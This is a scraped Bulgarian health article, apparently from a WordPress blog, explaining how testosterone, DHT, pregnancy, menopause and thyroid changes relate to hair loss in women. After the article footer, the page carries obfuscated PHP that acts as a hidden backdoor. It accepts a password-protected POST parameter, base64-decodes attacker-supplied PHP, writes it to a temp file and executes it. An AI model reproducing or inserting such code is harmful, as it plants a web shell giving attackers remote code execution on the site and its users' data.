Хормони и косопад при жените | Косопад

Хормони и косопад при жените

dieta67Хормоните играят важна роля в човешкото тяло, тъй като изпълняват важни функции в развитието, изпълнението и баланса в системите и органите. Жлезите в ендокринната система регулират дейността.

Имаме голямо разнообразие от хормони, въпреки че две от тях са свързани с капилярните проблеми – тестостерон и естрогени. Тези два хормона регулират свързаното с пола, също и функциите на жлезите за хармонично действие на организма.

Типичен случай: дехидротестостерон
В случая на тестостерона, например, е мъжкият хормон, но се среща и в жените. От него зависи доброто действие на репродуктивната система и има тясна връзка с проблемите, свързани с косопада. Има фундаментална роля при андрогенната алопеция.

Мъжете, тъй като произвеждат повече тестостерон от жените, имат повече косопад. Загубата на коса се случва, когато тестостеронът се превръща в дехидротестостерон (ДХТ). Той се събира в рецепторите на космените корени, като намалява развитието на косата и увеличава етапа на падането на косата. Във времето намалява растежа, бавен косопад и накрая се стига до алопеция.

ДХТ предизвиква косопад, когато няма баланс в хормоните от щитовидната жлеза, в прогестерона, в естрогена.

Хормонални промени и косопад при жените
В определени житейски ситуации при жените се случват хормонални промени, които причиняват косопад: при раждане, хормонипо време на бременност, в предменопауза и менопауза.

Най- често хормоналните промени обикновено са причината, когато става въпрос за косопад при жените. Обикновено този хормонален дисбаланс обикновено се лекуват, временни са.

Например при бременност, когато косопадът е по- малко от нормалното, дори расте повече коса, като причина от увеличеното производство на определени хормони. Когато родите, тези нива се връщат към нормалните си стойности и косата започва да капе.

По време на менопаузата и пред- менопаузата също можете да загубите доста коса. Прогестеронът и естрогенът може да променят нивата си, да намалеят, което застрашава дейността на космените корени, като прави косата слаба.

Косопадът може да е причинен и от промени с хормоните на щитовидната жлеза. Разбира се, може да има и други причини. Затова се обърнете към лекар, за да установите къде точно е проблема.

18. януари 2014 20:06:57 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}